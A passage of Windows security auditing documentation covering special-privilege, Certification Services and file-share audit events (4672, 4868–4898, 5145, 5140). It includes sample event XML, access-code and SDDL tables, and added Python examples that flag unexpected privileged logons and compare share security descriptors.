SeTcbPrivilege | Act as part of the operating system | This privilege identifies its holder as part of the trusted computer base. This user right allows a process to impersonate any user without authentication. The process can therefore gain access to the same local resources as that user.

Security Monitoring Recommendations


For 4672(S): Special privileges assigned to new logon.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Monitor for this event where “Subject\Security ID” is not one of these well-known security principals:
LOCAL SYSTEM, NETWORK SERVICE, LOCAL SERVICE, and where “Subject\Security ID” is not an
administrative account that is expected to have the listed Privileges.
If you have a list of specific privileges which should never be granted, or granted only to a few accounts (for
example, SeDebugPrivilege), use this event to monitor for those “Privileges.”
If you are required to monitor any of the sensitive privileges in the Event Description for this event, search for
those specific privileges in the event.
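The three recommendations above, applied to a parsed 4672 event, as an added example that is not code from the Microsoft page. It skips the well-known service principals by their fixed SIDs, flags any other subject that is not on an allowlist of expected administrative accounts, and separately flags privileges from a "granted only to a few accounts" list. The allowlist (EXPECTED_ADMIN_SIDS) and the restricted-privilege set are constructed assumptions; the sample event is the page's own 4672 XML with the System section shortened.

```python
# Added example (not from the Microsoft page): apply the 4672 monitoring
# recommendations above to a parsed event.
import xml.etree.ElementTree as ET

EVENT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Well-known principals the recommendation excludes: LOCAL SYSTEM, LOCAL SERVICE,
# NETWORK SERVICE (their fixed SIDs).
WELL_KNOWN_SERVICE_SIDS = {"S-1-5-18", "S-1-5-19", "S-1-5-20"}

# Constructed allowlist (assumption): administrative accounts expected to hold
# sensitive privileges. dadmin (RID 1104, the page's sample subject) is deliberately absent.
EXPECTED_ADMIN_SIDS = {"S-1-5-21-3457937927-2839227994-823803824-500"}

# Constructed "granted only to a few accounts" list (assumption), following the
# page's SeDebugPrivilege example.
RESTRICTED_PRIVILEGES = {"SeDebugPrivilege", "SeTcbPrivilege", "SeCreateTokenPrivilege"}

# Sample event copied from the page's 4672 XML (System section shortened).
SAMPLE_4672 = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4672</EventID><Computer>DC01.contoso.local</Computer></System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x671101</Data>
    <Data Name="PrivilegeList">SeTcbPrivilege SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege
SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeEnableDelegationPrivilege
SeImpersonatePrivilege</Data>
  </EventData>
</Event>"""


def parse_4672(xml_text):
    """Return the subject and the privilege list (whitespace- or newline-separated)."""
    root = ET.fromstring(xml_text)
    data = {d.get("Name"): (d.text or "") for d in root.find("e:EventData", EVENT_NS)}
    return {
        "subject_sid": data["SubjectUserSid"],
        "subject": f'{data["SubjectDomainName"]}\\{data["SubjectUserName"]}',
        "logon_id": data["SubjectLogonId"],
        "privileges": data["PrivilegeList"].split(),
    }


def evaluate_4672(event, expected_admins=EXPECTED_ADMIN_SIDS,
                  restricted=RESTRICTED_PRIVILEGES):
    """Return a list of findings; an empty list means expected noise
    (for example the SYSTEM logons the page says are routine)."""
    findings = []
    sid = event["subject_sid"]
    if sid in WELL_KNOWN_SERVICE_SIDS:
        return findings
    if sid not in expected_admins:
        findings.append(
            f"unexpected account {event['subject']} ({sid}) received sensitive "
            f"privileges in logon {event['logon_id']}"
        )
    # Restricted privileges are reported even for expected admins, so that a
    # change in what an admin account is granted is still visible.
    hits = sorted(set(event["privileges"]) & restricted)
    if hits:
        findings.append(
            f"{event['subject']} logon {event['logon_id']} holds restricted "
            f"privileges: {', '.join(hits)}"
        )
    return findings


if __name__ == "__main__":
    for line in evaluate_4672(parse_4672(SAMPLE_4672)):
        print(line)
```

The Logon ID carried in each finding is what you would use to join the 4672 to the 4624 logon event with the same Logon ID, which tells you the logon type and source of the session that received the privileges.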
Audit Application Generated

Applies to
Windows 10
Windows Server 2016
Audit Application Generated generates events for actions related to Authorization Manager applications.
The Audit Application Generated subcategory is out of scope of this document, because Authorization Manager is very rarely in use and it is deprecated starting from Windows Server 2012.

COMPUTER TYPE | GENERAL SUCCESS | GENERAL FAILURE | STRONGER SUCCESS | STRONGER FAILURE | COMMENTS
Domain Controller | IF | IF | IF | IF | IF – if you use Authorization Manager in your environment and you need to monitor events related to Authorization Manager applications, enable this subcategory.
Member Server | IF | IF | IF | IF | Same as for Domain Controller.
Workstation | IF | IF | IF | IF | Same as for Domain Controller.

Events List:
4665: An attempt was made to create an application client context.
4666: An application attempted an operation.
4667: An application client context was deleted.
4668: An application was initialized.
Audit Certification Services

Applies to
Windows 10
Windows Server 2016
Audit Certification Services determines whether the operating system generates events when Active Directory Certificate Services (AD CS) operations are performed.
Examples of AD CS operations include:
AD CS starts, shuts down, is backed up, or is restored.
Certificate revocation list (CRL)-related tasks are performed.
Certificates are requested, issued, or revoked.
Certificate manager settings for AD CS are changed.
The configuration and properties of the certification authority (CA) are changed.
AD CS templates are modified.
Certificates are imported.
A CA certificate is published to Active Directory Domain Services.
Security permissions for AD CS role services are modified.
Keys are archived, imported, or retrieved.
The OCSP Responder Service is started or stopped.
Monitoring these operational events is important to ensure that AD CS role services are functioning properly.
Event volume: Low to medium on servers that provide AD CS role services.
Role-specific subcategories are outside the scope of this document.

COMPUTER TYPE | GENERAL SUCCESS | GENERAL FAILURE | STRONGER SUCCESS | STRONGER FAILURE | COMMENTS
Domain Controller | IF | IF | IF | IF | IF – if a server has the Active Directory Certificate Services (AD CS) role installed and you need to monitor AD CS related events, enable this subcategory.
Member Server | IF | IF | IF | IF | Same as for Domain Controller.
Workstation | No | No | No | No | Active Directory Certificate Services (AD CS) role cannot be installed on client OS.

4868: The certificate manager denied a pending certificate request.
4869: Certificate Services received a resubmitted certificate request.
4870: Certificate Services revoked a certificate.
4871: Certificate Services received a request to publish the certificate revocation list (CRL).
4872: Certificate Services published the certificate revocation list (CRL).
4873: A certificate request extension changed.
4874: One or more certificate request attributes changed.
4875: Certificate Services received a request to shut down.
4876: Certificate Services backup started.
4877: Certificate Services backup completed.
4878: Certificate Services restore started.
4879: Certificate Services restore completed.
4880: Certificate Services started.
4881: Certificate Services stopped.
4882: The security permissions for Certificate Services changed.
4883: Certificate Services retrieved an archived key.
4884: Certificate Services imported a certificate into its database.
4885: The audit filter for Certificate Services changed.
4886: Certificate Services received a certificate request.
4887: Certificate Services approved a certificate request and issued a certificate.
4888: Certificate Services denied a certificate request.
4889: Certificate Services set the status of a certificate request to pending.
4890: The certificate manager settings for Certificate Services changed.
4891: A configuration entry changed in Certificate Services.
4892: A property of Certificate Services changed.
4893: Certificate Services archived a key.
4894: Certificate Services imported and archived a key.
4895: Certificate Services published the CA certificate to Active Directory Domain Services.
4896: One or more rows have been deleted from the certificate database.
4897: Role separation enabled.
4898: Certificate Services loaded a template.
Audit Detailed File Share

Applies to
Windows 10
Windows Server 2016
Audit Detailed File Share allows you to audit attempts to access files and folders on a shared folder.
The Detailed File Share setting logs an event every time a file or folder is accessed, whereas the File Share setting
only records one event for any connection established between a client and file share. Detailed File Share audit
events include detailed information about the permissions or other criteria used to grant or deny access.
There are no system access control lists (SACLs) for shared folders. If this policy setting is enabled, access to all
shared files and folders on the system is audited.
Event volume:
High on file servers.
High on domain controllers because of SYSVOL network access required by Group Policy.
Low on member servers and workstations.

COMPUTER TYPE | GENERAL SUCCESS | GENERAL FAILURE | STRONGER SUCCESS | STRONGER FAILURE | COMMENTS
Domain Controller | No | Yes | No | Yes | Audit Success for this subcategory on domain controllers typically will lead to very high volume of events, especially for SYSVOL share. We recommend monitoring Failure access attempts: the volume should not be very high. You will be able to see who was not able to get access to a file or folder on a network share on a computer.
Member Server | IF | Yes | IF | Yes | IF – If a server has shared network folders which typically get many access requests (File Server, for example), the volume of events might be very high. If you really need to track all successful access events for every file or folder located on a shared folder, enable Success auditing or use the Audit File System subcategory, although that subcategory excludes some information in Audit Detailed File Share, for example, the client’s IP address. The volume of Failure events for member servers should not be very high (if they are not File Servers). With Failure auditing, you will be able to see who was not able to get access to a file or folder on a network share on this computer.
Workstation | IF | Yes | IF | Yes | IF – If a workstation has shared network folders which typically get many access requests, the volume of events might be very high. If you really need to track all successful access events for every file or folder located on a shared folder, enable Success auditing or use the Audit File System subcategory, although that subcategory excludes some information in Audit Detailed File Share, for example, the client’s IP address. The volume of Failure events for workstations should not be very high. With Failure auditing, you will be able to see who was not able to get access to a file or folder on a network share on this computer.

Events List:
5145(S, F): A network share object was checked to see whether client can be granted desired access.
5145(S, F): A network share object was checked to see whether client can be granted desired access.

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Detailed File Share
Event Description:
This event generates every time a network share object (file or folder) is accessed.
Important: Failure events are generated only when access is denied at the file share level. No events are generated if access was denied on the file system (NTFS) level.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5145</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12811</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-17T23:54:48.941761700Z" />
<EventRecordID>267092</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="524" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x38d34</Data>
<Data Name="ObjectType">File</Data>
<Data Name="IpAddress">fe80::31ea:6c3c:f40d:1973</Data>
<Data Name="IpPort">56926</Data>
<Data Name="ShareName">\\\\\*\\Documents</Data>
<Data Name="ShareLocalPath">\\??\\C:\\Documents</Data>
<Data Name="RelativeTargetName">Bginfo.exe</Data>
<Data Name="AccessMask">0x100081</Data>
<Data Name="AccessList">%%1541 %%4416 %%4423</Data>
<Data Name="AccessReason">%%1541: %%1801 D:(A;;FA;;;WD) %%4416: %%1801 D:(A;;FA;;;WD) %%4423: %%1801 D:(A;;FA;;;WD)</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested access to network share object. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested access to network share
object.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Network Information:
Object Type [Type = UnicodeString]: The type of an object that was accessed during the operation. Always
“File” for this event.
The most common Object Types are:

Directory, Event, Timer, Device, Mutant, Type, File, Token, Thread, Section, WindowStation, DebugObject, FilterCommunicationPort, EventPair, Driver, IoCompletion, Controller, SymbolicLink, WmiGuid, Process, Profile, Desktop, KeyedEvent, Adapter, Key, WaitablePort, Callback, Semaphore, Job, Port, FilterConnectionPort, ALPC Port

Source Address [Type = UnicodeString]: source IP address from which access was performed.
IPv6 address or ::ffff:IPv4 address of a client.
::1 or 127.0.0.1 means localhost.
Source Port [Type = UnicodeString]: source TCP or UDP port which was used from remote or local
machine to request the access.
0 for local access attempts.
Share Information:
Share Name [Type = UnicodeString]: the name of accessed network share. The format is:
\\*\SHARE_NAME.
Share Path [Type = UnicodeString]: the full system (NTFS) path for accessed share. The format is: \\??\PATH. Can be empty, for example for Share Name: \\*\IPC$.
Relative Target Name [Type = UnicodeString]: relative name of the accessed target file or folder. This file-
path is relative to the network share. If access was requested for the share itself, then this field appears as “\”.
Access Request Information:
Access Mask [Type = HexInt32]: the sum of hexadecimal values of requested access rights. See “Table 13.
File access codes.” for different hexadecimal values for access rights.
Accesses [Type = UnicodeString]: the list of access rights which were requested by Subject\Security ID.
These access rights depend on Object Type.

Table of file access codes

ACCESS | HEX VALUE, SCHEMA VALUE | DESCRIPTION
ReadData (or ListDirectory) | 0x1, %%4416 | ReadData - For a file object, the right to read the corresponding file data. For a directory object, the right to read the corresponding directory data. ListDirectory - For a directory, the right to list the contents of the directory.
WriteData (or AddFile) | 0x2, %%4417 | WriteData - For a file object, the right to write data to the file. For a directory object, the right to create a file in the directory (FILE_ADD_FILE). AddFile - For a directory, the right to create a file in the directory.
AppendData (or AddSubdirectory or CreatePipeInstance) | 0x4, %%4418 | AppendData - For a file object, the right to append data to the file. (For local files, write operations will not overwrite existing data if this flag is specified without FILE_WRITE_DATA.) For a directory object, the right to create a subdirectory (FILE_ADD_SUBDIRECTORY). AddSubdirectory - For a directory, the right to create a subdirectory. CreatePipeInstance - For a named pipe, the right to create a pipe.
ReadEA | 0x8, %%4419 | The right to read extended file attributes.
WriteEA | 0x10, %%4420 | The right to write extended file attributes.
Execute/Traverse | 0x20, %%4421 | Execute - For a native code file, the right to execute the file. This access right given to scripts may cause the script to be executable, depending on the script interpreter. Traverse - For a directory, the right to traverse the directory. By default, users are assigned the BYPASS_TRAVERSE_CHECKING privilege, which ignores the FILE_TRAVERSE access right. See the remarks in File Security and Access Rights for more information.
DeleteChild | 0x40, %%4422 | For a directory, the right to delete a directory and all the files it contains, including read-only files.
ReadAttributes | 0x80, %%4423 | The right to read file attributes.
WriteAttributes | 0x100, %%4424 | The right to write file attributes.
DELETE | 0x10000, %%1537 | The right to delete the object.
READ_CONTROL | 0x20000, %%1538 | The right to read the information in the object's security descriptor, not including the information in the system access control list (SACL).
WRITE_DAC | 0x40000, %%1539 | The right to modify the discretionary access control list (DACL) in the object's security descriptor.
WRITE_OWNER | 0x80000, %%1540 | The right to change the owner in the object's security descriptor.
SYNCHRONIZE | 0x100000, %%1541 | The right to use the object for synchronization. This enables a thread to wait until the object is in the signaled state. Some object types do not support this access right.
ACCESS_SYS_SEC | 0x1000000, %%1542 | The ACCESS_SYS_SEC access right controls the ability to get or set the SACL in an object's security descriptor.

Table 13. File access codes.

Access Check Results [Type = UnicodeString]: the list of access check results. The format of the result is:

REQUESTED_ACCESS: RESULT ACE_WHICH_ALLOWED_OR_DENIED_ACCESS.

REQUESTED_ACCESS – the name of requested access. See Table of file access codes, earlier in this topic.
RESULT:
Granted by – if access was granted.
Denied by – if access was denied.
ACE_WHICH_ALLOWED_OR_DENIED_ACCESS: the Security Descriptor Definition Language (SDDL) value for the Access Control Entry (ACE) which granted or denied access.

Note The Security Descriptor Definition Language (SDDL) defines string elements for enumerating information contained in the security descriptor.
Example:
O:BAG:SYD:(D;;0xf0007;;;AN)(D;;0xf0007;;;BG)(A;;0xf0007;;;SY)(A;;0x7;;;BA)S:ARAI(AU;SAFA;DCLCRPCRSDWDWO;;;WD)
O: = Owner. SID of specific security principal, or reserved (pre-defined) value, for example: BA (BUILTIN_ADMINISTRATORS), WD (Everyone), SY (LOCAL_SYSTEM), etc. See the list of possible values in the table below.

SDDL values for Access Control Entry

VALUE DESCRIPTION
"AO" Account operators
"RU" Alias to allow previous Windows 2000
"AN" Anonymous logon
"AU" Authenticated users
"BA" Built-in administrators
"BG" Built-in guests
"BO" Backup operators
"BU" Built-in users
"CA" Certificate server administrators
"CG" Creator group
"CO" Creator owner
"DA" Domain administrators
"DC" Domain computers
"DD" Domain controllers
"DG" Domain guests
"DU" Domain users
"EA" Enterprise administrators
"ED" Enterprise domain controllers
"WD" Everyone
"PA" Group Policy administrators
"IU" Interactively logged-on user
"LA" Local administrator
"LG" Local guest
"LS" Local service account
"SY" Local system
"NU" Network logon user
"NO" Network configuration operators
"NS" Network service account
"PO" Printer operators
"PS" Personal self
"PU" Power users
"RS" RAS servers group
"RD" Terminal server users
"RE" Replicator
"RC" Restricted code
"SA" Schema administrators
"SO" Server operators
"SU" Service logon user

G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
DACL/SACL entry format:
entry_type:inheritance_flags(ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
Example: D:(A;;FA;;;WD)
entry_type:
"D" - DACL
"S" - SACL
inheritance_flags:
"P" - SDDL_PROTECTED, Inheritance from containers that are higher in the folder hierarchy is blocked.
"AI" - SDDL_AUTO_INHERITED, Inheritance is allowed, assuming that "P" is not also set.
"AR" - SDDL_AUTO_INHERIT_REQ, Child objects inherit permissions from this object.
ace_type:
"A" - ACCESS ALLOWED
"D" - ACCESS DENIED
"OA" - OBJECT ACCESS ALLOWED: only applies to a subset of the object(s).
"OD" - OBJECT ACCESS DENIED: only applies to a subset of the object(s).
"AU" - SYSTEM AUDIT
"AL" - SYSTEM ALARM
"OU" - OBJECT SYSTEM AUDIT
"OL" - OBJECT SYSTEM ALARM
ace_flags:
"CI" - CONTAINER INHERIT: Child objects that are containers, such as directories, inherit the ACE as an explicit
ACE.
"OI" - OBJECT INHERIT: Child objects that are not containers inherit the ACE as an explicit ACE.
"NP" - NO PROPAGATE: only immediate children inherit this ace.
"IO" - INHERITANCE ONLY: ace doesn’t apply to this object, but may affect children via inheritance.
"ID" - ACE IS INHERITED
"SA" - SUCCESSFUL ACCESS AUDIT
"FA" - FAILED ACCESS AUDIT
rights: A hexadecimal string which denotes the access mask or reserved value, for example: FA (File All Access),
FX (File Execute), FW (File Write), etc.

VALUE DESCRIPTION
Generic access rights:
"GA" GENERIC ALL
"GR" GENERIC READ
"GW" GENERIC WRITE
"GX" GENERIC EXECUTE
File access rights:
"FA" FILE ALL ACCESS
"FR" FILE GENERIC READ
"FW" FILE GENERIC WRITE
"FX" FILE GENERIC EXECUTE
Registry key access rights:
"KA" KEY ALL ACCESS
"KR" KEY READ
"KW" KEY WRITE
"KX" KEY EXECUTE
Directory service access rights:
"RC" Read Permissions
"SD" Delete
"WD" Modify Permissions
"WO" Modify Owner
"RP" Read All Properties
"WP" Write All Properties
"CC" Create All Child Objects
"DC" Delete All Child Objects
"LC" List Contents
"SW" All Validated Writes
"LO" List Object
"DT" Delete Subtree
"CR" All Extended Rights

object_guid: N/A
inherit_object_guid: N/A
account_sid: SID of specific security principal, or reserved value, for example: AN (Anonymous), WD (Everyone), SY (LOCAL_SYSTEM), etc. See the table above for more details.
For more information about SDDL syntax, see these articles: https://msdn.microsoft.com/library/cc230374.aspx,
https://msdn.microsoft.com/library/windows/hardware/aa374892(v=vs.85).aspx.
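The SDDL grammar described above, as an added example (not Microsoft's code): a small Python parser for the O:/G:/D:/S: form and the six ACE fields shown here, plus a comparison routine for the Old SD / New SD values that event 5143 later on this page reports. The alias dictionaries are subsets of the tables on this page; object GUIDs and conditional ACEs are not interpreted, and the owner-change, ACE-added/removed and Everyone/FA findings are this example's own choice of what to flag.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

SID_ALIASES = {  # subset of the "SDDL values for Access Control Entry" table
    "AN": "Anonymous logon", "AU": "Authenticated users", "BA": "Built-in administrators",
    "BG": "Built-in guests", "BU": "Built-in users", "DA": "Domain administrators",
    "DU": "Domain users", "SY": "Local system", "WD": "Everyone", "CO": "Creator owner",
}
RIGHTS_ALIASES = {  # subset of the rights table
    "GA": "GENERIC ALL", "GR": "GENERIC READ", "GW": "GENERIC WRITE", "GX": "GENERIC EXECUTE",
    "FA": "FILE ALL ACCESS", "FR": "FILE GENERIC READ", "FW": "FILE GENERIC WRITE",
    "FX": "FILE GENERIC EXECUTE", "RC": "Read Permissions", "SD": "Delete",
    "WD": "Modify Permissions", "WO": "Modify Owner", "RP": "Read All Properties",
    "WP": "Write All Properties", "CC": "Create All Child Objects",
    "DC": "Delete All Child Objects", "LC": "List Contents", "SW": "All Validated Writes",
    "LO": "List Object", "DT": "Delete Subtree", "CR": "All Extended Rights",
}
ACE_TYPES = {"A": "ACCESS ALLOWED", "D": "ACCESS DENIED", "OA": "OBJECT ACCESS ALLOWED",
             "OD": "OBJECT ACCESS DENIED", "AU": "SYSTEM AUDIT", "AL": "SYSTEM ALARM",
             "OU": "OBJECT SYSTEM AUDIT", "OL": "OBJECT SYSTEM ALARM"}
ACE_FLAGS = {"CI": "CONTAINER INHERIT", "OI": "OBJECT INHERIT", "NP": "NO PROPAGATE",
             "IO": "INHERITANCE ONLY", "ID": "ACE IS INHERITED",
             "SA": "SUCCESSFUL ACCESS AUDIT", "FA": "FAILED ACCESS AUDIT"}


def split_pairs(s: str) -> List[str]:
    """Split a run of two-letter SDDL aliases such as 'OICI' into ['OI', 'CI']."""
    return [s[i:i + 2] for i in range(0, len(s), 2)]


@dataclass(frozen=True)
class Ace:
    ace_type: str  # (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
    ace_flags: str
    rights: str
    object_guid: str
    inherit_object_guid: str
    account_sid: str

    @classmethod
    def parse(cls, text: str) -> "Ace":
        fields = text.split(";")
        if len(fields) != 6:
            raise ValueError(f"ACE needs six ';'-separated fields: {text!r}")
        return cls(*fields)

    def rights_names(self) -> List[str]:
        if self.rights.lower().startswith("0x"):  # raw access mask such as 0xf0007
            return [self.rights]
        return [RIGHTS_ALIASES.get(r, r) for r in split_pairs(self.rights)]

    def describe(self) -> str:
        flags = ", ".join(ACE_FLAGS.get(f, f) for f in split_pairs(self.ace_flags)) or "none"
        return (f"{ACE_TYPES.get(self.ace_type, self.ace_type)} for "
                f"{SID_ALIASES.get(self.account_sid, self.account_sid)}: "
                f"{' + '.join(self.rights_names())} (flags: {flags})")


def parse_sddl(sddl: str) -> Dict[str, object]:
    """Return owner, group, and the DACL/SACL inheritance flags and ACE lists."""
    result: Dict[str, object] = {"owner": None, "group": None, "dacl_flags": "", "dacl": [],
                                 "sacl_flags": "", "sacl": []}
    # Top-level markers are O:, G:, D: and S:.  SIDs and ACEs never contain ':', so
    # splitting in front of each marker is safe for the forms shown on this page.
    for part in re.split(r"(?=[OGDS]:)", sddl):
        if not part:
            continue
        key, body = part[0], part[2:]
        if key == "O":
            result["owner"] = body
        elif key == "G":
            result["group"] = body
        else:
            section = "dacl" if key == "D" else "sacl"
            result[section + "_flags"] = body.split("(", 1)[0]
            result[section] = [Ace.parse(a) for a in re.findall(r"\(([^()]*)\)", body)]
    return result


def compare_sddl(old_sd: str, new_sd: str) -> List[str]:
    """Findings for a 5143 event: owner change, ACEs added or removed, and any
    allow ACE that leaves Everyone (WD) with FILE ALL ACCESS on the share."""
    old, new = parse_sddl(old_sd), parse_sddl(new_sd)
    findings: List[str] = []
    if old["owner"] != new["owner"]:
        findings.append(f"owner changed: {old['owner']} -> {new['owner']}")
    for sec in ("dacl", "sacl"):
        findings += [f"{sec.upper()} removed: {a.describe()}" for a in old[sec] if a not in new[sec]]
        findings += [f"{sec.upper()} added: {a.describe()}" for a in new[sec] if a not in old[sec]]
    for ace in new["dacl"]:
        if ace.ace_type == "A" and ace.account_sid == "WD" and "FA" in split_pairs(ace.rights):
            findings.append("Everyone (WD) has FILE ALL ACCESS on the share")
    return findings


# The SDDL example from this page, and the Old SD / New SD values of the 5143 sample event.
PAGE_EXAMPLE = ("O:BAG:SYD:(D;;0xf0007;;;AN)(D;;0xf0007;;;BG)(A;;0xf0007;;;SY)(A;;0x7;;;BA)"
                "S:ARAI(AU;SAFA;DCLCRPCRSDWDWO;;;WD)")
OLD_SD_5143 = "O:S-1-5-21-3457937927-2839227994-823803824-1104G:DAD:(A;OICI;FA;;;BA)(A;OICI;FA;;;WD)"
NEW_SD_5143 = ("O:BAG:DAD:(D;;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)"
               "(A;OICI;FA;;;WD)(A;OICI;FA;;;BA)")
```

`compare_sddl(OLD_SD_5143, NEW_SD_5143)` reports the owner change to BA and the added deny ACE for the original owner's SID, which is exactly what a reviewer of that 5143 event wants to see first.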

Security Monitoring Recommendations

For 5145(S, F): A network share object was checked to see whether client can be granted desired access.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Monitor this event if the Network Information\Source Address is not from your internal IP range.
Monitor this event if the Network Information\Source Address should not be able to connect with the
specific computer (Computer:).
If you have critical files or folders on specific network shares, for which you need to monitor access attempts
(Success and Failure), monitor for specific Share Information\Share Name and Share
Information\Relative Target Name.
If you have domain or local accounts that should only be able to access a specific list of shared files or
folders, you can monitor for access attempts outside the allowed list.
We recommend that you monitor for these Access Request Information\Accesses rights (especially for
Failure):
WriteData (or AddFile)
AppendData (or AddSubdirectory or CreatePipeInstance)
WriteEA
DeleteChild
WriteAttributes
DELETE
WRITE_DAC
WRITE_OWNER
Audit File Share
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit File Share allows you to audit events related to file shares: creation, deletion, modification, and access
attempts. Also, it shows failed SMB SPN checks.
There are no system access control lists (SACLs) for shares; therefore, after this setting is enabled, access to all
shares on the system will be audited.
Combined with File System auditing, File Share auditing enables you to track what content was accessed, the
source (IP address and port) of the request, and the user account that was used for the access.
Event volume:
High on file servers.
High on domain controllers because of SYSVOL network access required by Group Policy.
Low on member servers and workstations.

Domain Controller: General Success = Yes; General Failure = Yes; Stronger Success = Yes; Stronger Failure = Yes.
Comments: We recommend Success auditing for domain controllers, because it’s important to track deletion, creation, and modification events for network shares. We recommend Failure auditing to track failed SMB SPN checks and failed access attempts to network shares.

Member Server: General Success = Yes; General Failure = Yes; Stronger Success = Yes; Stronger Failure = Yes.
Comments: We recommend Success auditing to track deletion, creation, modification, and access attempts to network share objects. We recommend Failure auditing to track failed SMB SPN checks and failed access attempts to network shares.

Workstation: General Success = Yes; General Failure = Yes; Stronger Success = Yes; Stronger Failure = Yes.
Comments: We recommend Success auditing to track deletion, creation, modification and access attempts to network share objects. We recommend Failure auditing to track failed SMB SPN checks and failed access attempts to network shares.

Events List:
5140(S, F): A network share object was accessed.
5142(S): A network share object was added.
5143(S): A network share object was modified.
5144(S): A network share object was deleted.
5168(F): SPN check for SMB/SMB2 failed.

5140(S, F): A network share object was accessed.
4/5/2019 • 4 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit File Share
Event Description:
This event generates every time a network share object is accessed.
It is generated once per session, when the first access attempt is made.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5140</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>12808</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-18T02:45:13.581231400Z" />
<EventRecordID>268495</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="772" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x541f35</Data>
<Data Name="ObjectType">File</Data>
<Data Name="IpAddress">10.0.0.100</Data>
<Data Name="IpPort">49212</Data>
<Data Name="ShareName">\\\\\*\\Documents</Data>
<Data Name="ShareLocalPath">\\??\\C:\\Documents</Data>
<Data Name="AccessMask">0x1</Data>
<Data Name="AccessList">%%4416</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions:
0 - Windows Server 2008, Windows Vista.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested access to network share object. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested access to network share
object.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Network Information:
Object Type [Type = UnicodeString]: The type of an object that was accessed during the operation. Always
“File” for this event.
The most common Object Types are:

